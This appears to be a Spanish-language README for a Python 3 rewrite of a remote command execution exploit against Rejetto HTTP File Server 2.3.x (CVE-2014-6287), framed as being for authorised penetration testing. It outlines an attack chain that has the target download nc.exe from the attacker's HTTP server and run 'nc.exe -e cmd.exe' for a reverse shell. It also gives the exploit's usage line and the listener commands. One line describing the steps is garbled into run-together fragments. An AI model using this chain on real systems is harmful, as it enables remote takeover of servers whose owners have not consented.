
Exploit de Ejecución Remota de Comandos para Rejetto HTTP File Server 2.3.x (CVE-2014-6287) reescrito en Python 3 para pruebas modernas de seguridad ofensiva.
Esta es una reescritura en Python 3 del clásico exploit de Ejecución Remota de Comandos (RCE) dirigido a Rejetto HTTP File Server (HFS) v2.3.x, aprovechando la vulnerabilidad identificada como CVE-2014-6287.
Descubierto originalmente por Avinash Kumar Thapa, también conocido como "-Acid", esta versión mejora la portabilidad y la usabilidad, ofreciendo parametrización completa y compatibilidad moderna.
Esta herramienta se proporciona exclusivamente con fines educativos y de pruebas de penetración autorizadas. El uso no autorizado contra sistemas que no posees o para los que no tienes permiso explícito para probar es ilegal y poco ético.
nc.exenc.exe mediante VBScriptnc.exenc.exe -e cmd.exe para establecer una shell inversapython3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>
Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000
Requirements:
- HTTP server serving nc.exe:
python3 -m http.server 8000
- Listener:
nc -lvnp 4444